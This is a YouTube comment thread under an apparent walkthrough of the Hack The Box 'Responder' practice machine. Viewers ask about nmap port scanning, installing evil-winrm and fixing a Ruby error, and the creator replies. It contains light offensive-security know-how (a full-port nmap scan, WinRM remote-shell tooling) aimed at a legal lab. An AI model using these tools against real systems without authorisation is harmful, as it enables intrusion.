not working only thing im going to hack is my head against the wall
@_CryptoCat 6 months ago
😂
@user-yb1xq3xd4i 8 months ago
WHY YOU DİDNT USE RESPONDER AT RESPONDER MACHİNE BROOOOOOOO THAT WAS NOT COOL
@_CryptoCat 8 months ago
hahaha 😂 I did use responder?? I'm guessing you mean why didn't I jump straight to the obvious solution (based on the name) - Since it's starting point and there will be lots of beginners, I basically want to get people into the habit of enumerating properly and try to demonstrate the process of elimination as I think this is more important than learning any one tool/technique 😆
@user-yb1xq3xd4i 8 months ago
you are right sir i want the obvious one but your way is better. nice work @@_CryptoCat
@_CryptoCat 8 months ago
🥰🥰🥰
@shorkshire3724 2 years ago
why it doesn't show me the port 5985 i'm using this: nmap --open -p- --min-rate 5000 -n -Pn IPADDRESS but just appeared port 80
@_CryptoCat 2 years ago
you'll want to scan all open ports with the -p- flag (or you can specify -p 5985 to speed up)
@SuadAhmed-ud5gt 4 months ago
When I used "evil-winRM" I have got this message "bash: Evil-WinRM: command not found" What should I do ?
@_CryptoCat 4 months ago
Ermmm if you are using Parrot/Kali it should be pre-installed, make sure it's typed exactly as in the video.. If not, you can check the install instructions: github.com/Hackplayers/evil-winrm?tab=readme-ov-file#installation--quick-start-4-methods
@dropz285 1 year ago
This was such an awesome video, especially when you go to hacktricks.. I didn't know that existed.
@_CryptoCat 1 year ago
Glad you liked it 🙂 HackTricks is one of the best resources for sure, I rarely solve CTF challenge or vulnerable machine without referring to it at some stage!
@conorroby882 2 years ago
I'm on the evil-winrm part and when i run it it gives me the error as follows. " /var/lib/gems/3.0.0/gems/evil-winrm-3.3/lib/evil-winrm.rb:123:in `completion_check': undefined method `quoting_detection_proc' for Reline:Module (NoMethodError) " please help!
@_CryptoCat 2 years ago
Hmmm it's weird that evil-winrm github doesn't even seem to have an "Issues" tab 🤔 Only thing I could find was: tryhackme.com/forum/thread/6171e3b46b0cfe00412b0a1d Did you install using 'sudo gem install evil-winrm'? Not sure what to suggest really, maybe reinstalling evil-winrm or Ruby itself will help 😕